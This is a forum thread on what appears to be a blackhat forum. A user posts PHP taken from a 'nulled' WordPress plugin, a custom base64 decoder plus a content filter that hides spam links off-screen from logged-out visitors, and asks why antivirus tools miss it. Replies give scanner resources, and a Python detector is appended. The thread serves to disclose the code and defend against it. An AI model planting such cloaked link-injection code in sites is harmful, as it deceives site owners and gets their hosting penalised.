Best Blackhat Forum

Full Version: PHP Malicious code in plugin or theme that Virustotal or Security software can't detect
Bad stuff !!
Why don't the AVs pick up on it?
Or...
Why isn't there a scanner for this sort of thing for those of us who aren't sure of what to look for in supposedly 'nulled' things ??
Thanks
PHP Code:
<?php

/**
 * Helper function for translation.
 */

// Base64 decoder written out by hand instead of calling base64_decode().
if (!function_exists('sanitize_context_zero')) {
    function sanitize_context_zero($input) {
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        do {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr((int)$chr1);
            if ($enc3 != 64) {
                $output = $output . chr((int)$chr2);
            }

            if ($enc4 != 64) {
                $output = $output . chr((int)$chr3);
            }

            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        }

        while ($i < strlen($input));
        return urldecode($output);
    }
}

// Filter callback: appends off-screen links to single-post content when the visitor is not logged in.
if ( ! function_exists('safemodecc') ) {

    function safemodecc( $content ) {

        if ( is_single() && ! is_user_logged_in() && ! is_feed() && ! stristr( $_SERVER['REQUEST_URI'], "amp" ) ) {

            $divclass = sanitize_context_zero('<div style="position:absolute;top:0;left:-9999px;">');
            $array = Array(
                    sanitize_context_zero("Free Download WordPress Themes"),
                    sanitize_context_zero("Download Premium WordPress Themes Free"),
                    sanitize_context_zero("Download WordPress Themes"),
                    sanitize_context_zero("Download WordPress Themes Free"),
                    sanitize_context_zero("Download Nulled WordPress Themes"),
                    sanitize_context_zero("Download Best WordPress Themes Free Download"),
                    sanitize_context_zero("Premium WordPress Themes Download")
            );
            $array2 = Array(
                    sanitize_context_zero("free download udemy paid course"),
                    sanitize_context_zero("udemy paid course free download"),
                    sanitize_context_zero("download udemy paid course for free"),
                    sanitize_context_zero("free download udemy course"),
                    sanitize_context_zero("udemy course download free"),
                    sanitize_context_zero("online free course"),
                    sanitize_context_zero("free online course"),
                    sanitize_context_zero("download lynda course free"),
                    sanitize_context_zero("lynda course free download"),
                    sanitize_context_zero("udemy free download")
            );
            $array3 = Array(
                    sanitize_context_zero("download mobile firmware"),
                    sanitize_context_zero("download samsung firmware"),
                    sanitize_context_zero("download micromax firmware"),
                    sanitize_context_zero("download intex firmware"),
                    sanitize_context_zero("download redmi firmware"),
                    sanitize_context_zero("download xiomi firmware"),
                    sanitize_context_zero("download lenevo firmware"),
                    sanitize_context_zero("download lava firmware"),
                    sanitize_context_zero("download karbonn firmware"),
                    sanitize_context_zero("download coolpad firmware"),
                    sanitize_context_zero("download huawei firmware")
            );

            $abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.thewpclub.net").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.themeslide.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.script-stack.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.thememazing.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.onlinefreecourse.net").'">' . $array2[array_rand($array2) ] . '</a></div>';
            $abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.frendx.com/firmware/").'">' . $array3[array_rand($array3) ] . '</a></div>';
            $abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.themebanks.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("https://downloadtutorials.net").'">' . $array2[array_rand($array2) ] . '</a></div>';

            $fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

        } else {

            $fullcontent = $content;

        }

        return $fullcontent;

    }
}

// Registers the callback on every post body unless it is already hooked.
if ( ! has_filter( 'the_content', 'safemodecc' ) ) {
    add_filter( 'the_content', 'safemodecc' );
}

I had a plugin installed for a year with no issues, then one day it activated and Google banned my shared server account based on one website. Reason enough for me.....
MassBlack
Maybe some of this is good to use and check with
https://www.hongkiat.com/blog/wordpress-...ous-codes/


Normalized URL: http://bestblackhatforum.com:80
Submission date: Wed Apr 24 13:18:37 2019
Server IP address: 104.18.48.93
Country: United States
Server: cloudflare
Malicious files: 0
Suspicious files: 0
Potentially Suspicious files: 0
Clean files: 94
External links detected: 290
Iframes scanned: 0
Blacklisted: No
Interesting addition by Xiaofang - Thanks
Attached is that site's page as a short PDF with all the excess blogging adverts, etc. removed.

Perhaps it will help some folks to better secure their WP sites.

Source from above reply:
Code:
https://www.hongkiat.com/blog/wordpress-plugins-detect-malicious-codes/
Just update the url and decode site at 1st post
thanks man. Just added this site https://www.thewpclub.net/ into my block list.
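
Added example, not part of any post in this thread: a static scanner for the indicators visible in the sample from the first post (a hand-written base64 alphabet, a `the_content` filter, a logged-in-user check, and markup positioned off-screen). It assumes the strings are stored base64-encoded in the file on disk; the indicator names, the `is_suspicious` rule and both sample inputs are constructed for illustration.

```python
import base64
import re

# Indicators taken from the sample posted in this thread.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
OFFSCREEN = re.compile(r"position\s*:\s*absolute[^>]*?(?:left|top)\s*:\s*-\d{3,}px", re.I)
CONTENT_HOOK = re.compile(r"add_filter\s*\(\s*['\"]the_content['\"]")
LOGIN_CLOAK = re.compile(r"!\s*is_user_logged_in\s*\(")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decoded_tokens(source):
    """Yield the decoding of every base64-looking run in the source."""
    for token in B64_TOKEN.findall(source):
        try:
            if len(token) % 4 == 0:
                yield base64.b64decode(token, validate=True).decode("latin-1")
        except ValueError:
            continue

def scan_php(source):
    """Return the set of indicator names present in one PHP source string."""
    hits = set()
    if B64_ALPHABET in source:
        hits.add("custom-base64-decoder")
    if CONTENT_HOOK.search(source):
        hits.add("the_content-filter")
    if LOGIN_CLOAK.search(source):
        hits.add("hidden-from-logged-in-users")
    if any(OFFSCREEN.search(t) for t in [source, *decoded_tokens(source)]):
        hits.add("offscreen-markup")
    return hits

def is_suspicious(hits):
    """Assumed rule: obfuscation or hidden markup plus one more indicator."""
    return len(hits) >= 2 and bool(hits & {"custom-base64-decoder", "offscreen-markup"})

# Constructed samples; the hidden <div> is base64-encoded (an assumption, see lead-in).
_DIV = base64.b64encode(b'<div style="position:absolute;top:0;left:-9999px;">').decode()
SAMPLE_NULLED = (
    '<?php $keyStr = "' + B64_ALPHABET + '=";\n'
    '$divclass = sanitize_context_zero("' + _DIV + '");\n'
    "if ( is_single() && ! is_user_logged_in() ) { $content .= $divclass; }\n"
    "add_filter('the_content', 'safemodecc');\n"
)
SAMPLE_CLEAN = "<?php add_filter('the_content', 'my_share_buttons');\n"

if __name__ == "__main__":
    for name, src in (("nulled", SAMPLE_NULLED), ("clean", SAMPLE_CLEAN)):
        print(name, sorted(scan_php(src)), is_suspicious(scan_php(src)))
```

A hit is a reason to read the file by hand, not a verdict: themes legitimately hook `the_content`, which is why a single indicator is not flagged.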